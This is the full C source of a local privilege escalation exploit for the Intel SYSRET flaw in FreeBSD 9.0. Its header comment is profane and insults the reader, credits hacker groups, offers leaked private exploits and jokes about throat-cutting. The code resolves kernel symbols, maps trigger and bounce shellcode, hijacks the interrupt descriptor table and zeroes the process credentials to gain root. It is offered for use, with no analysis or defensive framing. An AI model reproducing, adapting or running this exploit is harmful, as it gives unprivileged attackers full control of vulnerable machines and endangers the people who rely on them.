FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

/*
 * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit
 * Author: CurcolHekerLink
 *
 * This exploit is based on an open source project, so I can make it open source too. Right?
 *
 * If you blaming me for open sourcing this exploit, you can fuck your mom. Free of charge :)
 *
 * Credits to KEPEDEAN Corp, Barisan Sakit Hati, ora iso sepaying meneh hekerlink,
 * Kismin perogeremer cyber team, petboylittledick, 1337 Curhat Crew and others at #MamaDedehEliteCurhatTeam
 * if you would like next private exploit leakage, just mention @MamahhDedeh
 *
 * Some people may feel harmed when we release this exploit :))
 *
 * p.s: Met idul Adha ya besok, saatnya potong leher dewa lo... eh maksudnya potong Sapisisasi :))
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>
#define TRIGGERSIZE 20
#define BOUNCESIZE 18

uintptr_t Xdivp, Xdbgp, Xbptp, Xoflp, Xbndp, Xillp, Xdnap, Xfpusegmp, Xtssp, Xmissingp, Xstkp, Xprotp, Xpagep, Xfpup, Xalignp, Xmchkp, Xxmmp;

struct gate_descriptor * sidt()
{
        struct region_descriptor idt;
        asm ("sidt %0": "=m"(idt));
        return (struct gate_descriptor*)idt.rd_base;
}

u_long matchsym(char *symname)
{
        struct kld_sym_lookup ksym;
        ksym.version = sizeof (ksym);
        ksym.symname = symname;
        if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
                perror("kldsym");
                exit(1);
        }
        return ksym.symvalue;
}

void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
        struct gate_descriptor *ip;
        ip = idt + idx;
        ip->gd_looffset = func;
        ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
        ip->gd_ist = ist;
        ip->gd_xx = 0;
        ip->gd_type = typ;
        ip->gd_dpl = dpl;
        ip->gd_p = 1;
        ip->gd_hioffset = func>>16;
}

void payload()
{
        printf("[+] Woohoo!!!\n");
        exit(0);
}

void resetidt()
{
        struct thread *td;
        struct ucred *cred;
        struct gate_descriptor *idt = sidt();
        setidt(idt, IDT_DE, Xdivp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_DB, Xdbgp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_BP, Xbptp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_OF, Xoflp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_BR, Xbndp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_UD, Xillp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_NM, Xdnap, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_FPUGP, Xfpusegmp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_TS, Xtssp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_NP, Xmissingp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_SS, Xstkp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_GP, Xprotp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_PF, Xpagep, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_MF, Xfpup, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_AC, Xalignp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_MC, Xmchkp, SDT_SYSIGT, SEL_KPL, 0);
        setidt(idt, IDT_XF, Xxmmp, SDT_SYSIGT, SEL_KPL, 0);

        asm ("mov %%gs:0, %0" : "=r"(td));

        cred = td->td_proc->p_ucred;
        cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
        cred->cr_groups[0] = 0;

        asm ("swapgs; sysretq;" :: "c"(payload));
}

void resolving()
{
        Xdivp = (uintptr_t)matchsym("Xdiv");
        Xdbgp = (uintptr_t)matchsym("Xdbg");
        Xbptp = (uintptr_t)matchsym("Xbpt");
        Xoflp = (uintptr_t)matchsym("Xofl");
        Xbndp = (uintptr_t)matchsym("Xbnd");
        Xillp = (uintptr_t)matchsym("Xill");
        Xdnap = (uintptr_t)matchsym("Xdna");
        Xfpusegmp = (uintptr_t)matchsym("Xfpusegm");
        Xtssp = (uintptr_t)matchsym("Xtss");
        Xmissingp = (uintptr_t)matchsym("Xmissing");
        Xstkp = (uintptr_t)matchsym("Xstk");
        Xprotp = (uintptr_t)matchsym("Xprot");
        Xpagep = (uintptr_t)matchsym("Xpage");
        Xfpup = (uintptr_t)matchsym("Xfpu");
        Xalignp = (uintptr_t)matchsym("Xalign");
        Xmchkp = (uintptr_t)matchsym("Xmchk");
        Xxmmp = (uintptr_t)matchsym("Xxmm");
}

void trigger()
{
        printf("[+] Crotz...\n");
        uint64_t pagesize = getpagesize();
        uint8_t * mappedarea = (uint8_t*)((1ULL << 47) - pagesize);
        mappedarea = mmap(mappedarea, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
        if (mappedarea == MAP_FAILED) {
                perror("mmap (trigger)");
                exit(1);
        }

        char triggerpayload[] =
                "\xb8\x18\x00\x00\x00"
                "\x48\x89\xe3"
                "\x48\xbc\xef\xbe\xad\xde\xef\xbe\xad\xde"
                "\x0f\x05";

        uint8_t * offset_addr = mappedarea + pagesize - TRIGGERSIZE;
        memcpy(offset_addr, triggerpayload, TRIGGERSIZE);

        *(uint64_t*)(offset_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
        printf("[+] Crotz...\n");
        char bouncepayload[] =
                "\x0f\x01\xf8"
                "\x48\x89\xdc"
                "\x48\xb8\xef\xbe\xad\xde\xef\xbe\xad\xde"
                "\xff\xe0";

        uint8_t * bouncer = (uint8_t*)(0x900000000 | (Xpagep & 0xFFFFFFFF));
        size_t bouncer_allocsize = pagesize;
        if ((uint8_t*)((uint64_t)bouncer & ~(pagesize-1)) + pagesize < bouncer + BOUNCESIZE)
                bouncer_allocsize += pagesize;
        if (mmap((void*)((uint64_t)bouncer & ~(pagesize-1)), bouncer_allocsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
        {
                perror("mmap (bouncer)");
                exit(1);
        }
        memcpy(bouncer, bouncepayload, BOUNCESIZE);
        *(uint64_t*)(bouncer + 8) = (uint64_t)resetidt;
        ((void (*)())offset_addr)();
}

int main(int argc, char *argv[])
{
        printf("[+] SYSRET FUCKUP!!\n");
        printf("[+] Start Engine...\n");
        resolving();
        printf("[+] Crotz...\n");
        trigger();
        return 0;
}